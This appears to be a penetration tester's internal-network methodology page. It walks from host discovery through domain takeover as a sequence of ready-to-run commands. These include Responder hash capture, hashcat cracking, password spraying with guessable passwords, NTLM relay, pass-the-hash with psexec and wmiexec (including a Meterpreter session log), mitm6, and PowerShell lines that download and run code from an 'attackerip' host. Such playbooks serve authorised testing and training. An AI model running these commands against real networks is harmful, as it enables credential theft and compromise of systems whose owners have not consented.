Basic Internal Network test

Slightly less than the minimum standard

Start responder
Start nessus
Check outbound internet access

Host Discovery

If not given targets list try Nmap Ping Scan Private Ranges and start responder

sudo responder -I eth0

nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp 
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp

# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12  -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16  -p80,445,22 --rate 100000000 | tee -a Targets.tmp

#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp

#Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp

#netdiscover
netdiscover -i eth0 -P

#NBTScan
nbtscan 192.168.1.0/24

Now cat grep and sort the IP addresses into a file called Targets.txt

If given a range do the following

nmap -sn 192.168.10.0/24 -n | grep report | cut -d ' ' -f 5 | tee -a ipaddresses.txt | tee -a targets.txt
nmap -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5- | tee -a host-ip.txt

Nmap Scans

mkdir Scans
nmap -p 21 -n --open -iL targets.txt -oN Scans/ftp
nmap -p 22 -n --open -iL targets.txt -oN Scans/ssh
nmap -p 23 -n --open -iL targets.txt -oN Scans/telnet
nmap -p 80 -n --open -iL targets.txt -oN Scans/http
nmap -p 443 -n --open -iL targets.txt -oN Scans/https
nmap -p 445 -n --open -iL targets.txt -oN Scans/smb
nmap -p 3389 -n --open -iL targets.txt -oN Scans/rdp

cat Scans/ftp | grep for | cut -d " " -f 5 > ftphosts.txt
cat Scans/ssh | grep for | cut -d " " -f 5 > sshhosts.txt
cat Scans/telnet | grep for | cut -d " " -f 5 > telnethosts.txt
cat Scans/http | grep for | cut -d " " -f 5 > httphosts.txt
cat Scans/https | grep for | cut -d " " -f 5 > httpshosts.txt
cat Scans/smb | grep for | cut -d " " -f 5 > smbhosts.txt
cat Scans/rdp | grep for | cut -d " " -f 5 > rdphosts.txt

Scanning

Start Nessus on discovered IP addresses

Run networkscan.sh against all targets.txt using rush

Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.

Find OS version with cme

crackmapexec smb smbhosts.txt | tee -a smb-os-versionst.txt

Make a note of the domain etc and older OS's

Network Service Scan

Run this as root as some of the nmap scans require privs and sudo can be flakey

Requirements

go get -u github.com/shenwei356/rush/

Usage

~/go/bin/rush -i targets.txt -c "./networkscan.sh {}"

mkdir -p networkscan
cd networkscan
target=$(echo $1 | cut -d "/" -f 3)
userlist=~/jdksec/Payloads/top-usernames-shortlist.txt
passlist=~/jdksec/Payloads/darkweb2017-top100.txt
line="\n=====================\n"
mkdir -p $target
cd $target
mkdir nmap-basic
mkdir nmap-udp
echo "#####################################################################" | tee -a report-$target.txt
echo "Scan report for $target" |tee -a report-$target.txt
echo "#####################################################################" | tee -a report-$target.txt
echo "$line Nmap Scan for $target...$line " | tee -a report-$target.txt
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $target | grep "^[0-9]" | cut -d '/' -f 1 | tr  '\n' ',' | sed s/,$//)
echo "## Open Ports:\n";for i in $(echo $ports | sed 's/,/\n/g'); do echo $target:$i; done | tee -a ports-$target.txt
echo "\n"
nmap -Pn -sC -sV -p $ports $target -oN nmap-basic/$target
cat nmap-basic/* >> report-$target.txt
echo "$line Nmap UDP ...$line " | tee -a report-$target.txt
sudo nmap -sUVC --open $target --top-ports 20 -oN nmap-udp/$target
cat nmap-udp/* >> report-$target.txt
cd nmap-basic/
grep -Hari "/tcp" | grep -v ":|" >> ../services-$target.txt
cd ../
cd nmap-udp/
grep -Hari "/udp" | grep -v filtered >> ../services-$target.txt
cd ../
echo "$line Services ...$line " | tee -a report-$target.txt
cat services-$target.txt | tee -a report-$target.txt
echo "$line Ports ...$line " | tee -a report-$target.txt
cat ports-$target.txt | tee -a report-$target.txt
mv nmap-basic/$target nmap-tcp-$target.txt
mv nmap-udp/$target nmap-udp-$target.txt
/bin/rm -rf nmap-udp
/bin/rm -rf nmap-basic

Gather Webservers

cat networkscan/*/service* | cut -d '/' -f 1 | tee -a ports.txt | ~/go/bin/httprobe| tee -a webservers.txt

Now open in firefox, check default creds etc

for i in $(cat webservers.txt); do firefox $i; sleep 1; done

Scan with nuclei

cat webservers.txt | ~/go/bin/nuclei -nts -nc -silent | tee -a vulnscan.txt

Basic Vuln scan quick wins

msfconsole -qx "color false;use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
msfconsole -qx "color false;use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt

Check responder for hashes and crack with hashcat

cat /usr/share/responder/logs/*NTLM* | sort -u >> hashes.txt; cat hashes.txt | sort -u -o hashes.txt
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

# Much Slower so use npk if possible or cloud cracker
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule

Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl

cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/

Then repeat the cracking process with a better password/rule list.

Domain enumeration

Get DC List

# Windows command
nltest /DCLIST:domain.local

# Linux Commands
cat /etc/resolv.conf

nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt

for i in (cat Targets.txt); do nslookup $i | grep "dc"; done 

nslookup 
> set type=all
_ldap._tcp.dc._msdcs.DOMAIN

Get user list

rpcclient -U "domain\\username" 10.0.0.1 (DC)
rpcclient $> enumdomusers

Copy list of users to "rpcuserlist.txt" file and sort:

cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.

May be worth checking the password lockout policy with the client if in a sensitive environment.

msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp
run

When time is up change the password and rerun.

Passwords to try:

Clientname2019
Location2019
Password12345!
Summer2019!
Spring2019!
Summer2018!
Password2018!
Welcome2018!
Password 2018!
Summer@2018

Find open file servers

SMB Map

Find open SMB shares which are available unauthenticated

for i in $(cat targets.txt);do smbmap -H $i; done | tee -a smbmap-output.txt

Find open writable shares and search for authenticated file servers:

for i in $(cat targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt 
ctrl + f WRITE (Search for writable folders)

EyeWitness

python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml

NTLM Relay

Modify Responder.conf to turn off HTTP and SMB

[Responder Core]

; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On

Start responder

python Responder.py -I <interface> -r -d -w
responder -I <interface> -r -d -w

Create a list of targets with SMB signing disabled.

nmap -n -p 137,139,445 --script=smb-security-mode -iL smbhosts.txt | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt

Now start ntlmrelayx.py against the targets

python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt

If you capture a high priv users account it will drop the hashes from the system

Now use psexec within metasploit to login to the target

msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit

Sometimes ntlmrelay fails, to fix, run the following

Clone latest impacket
cd impacket
sudo python3.10 -m pip install . --user
python3.10 examples/ntlmrelayx.py -tf ../smbsigningdisabled.txt

Pass the hash

Either will do, once the enumeration has finished upload the csv files to your attacker machine.

Then run

python ntlmrelayx.py -tf smbsigningdisabled.txt

root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash

root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
Server\Administrator

root@Kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
root@Kali:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
root@Kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
root@Kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25

root@Kali:~# wmiexec.py  -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 [email protected]
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

root@Kali:~# apt-get update
root@Kali:~# apt-get install freerdp-x11
root@Kali:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25

msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 
msf exploit(psexec) > set SMBUser Administrator 
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444 
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200

meterpreter > exit

This will output the local hashes if you capture a domain admins NTLM hash.

Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py

Bloodhound

Once on the domain as a windows user run the following:

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"

Once on your attacker machine make sure you have bloodhound installed and then execute:

neoj4 console
bloodhound

Visit 127.0.0.1:7687

Enter your password and upload the csv files you extracted from the target.

Click queries and then find shortest path to domain admin

MITM6

git clone https://github.com/fox-it/mitm6.git
cd mitm6
mitm6 -d domain.local

In a new window

ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data

Wait 30 mins to an hour for the IPV6 to update

cd data
firefox domain_users_by_group.html

Review ntlmrelayx.py output and look for new user and password added when a DA logs in

Once on the domain see https://www.jdksec.com/guides/powershell-powerview

The worst of both worlds: Combining NTLM Relaying and Kerberos delegationdirkjanm.io

PreviousBasic Buffer Overflow NextBasic Mobile Testing guide

Last updated 3 years ago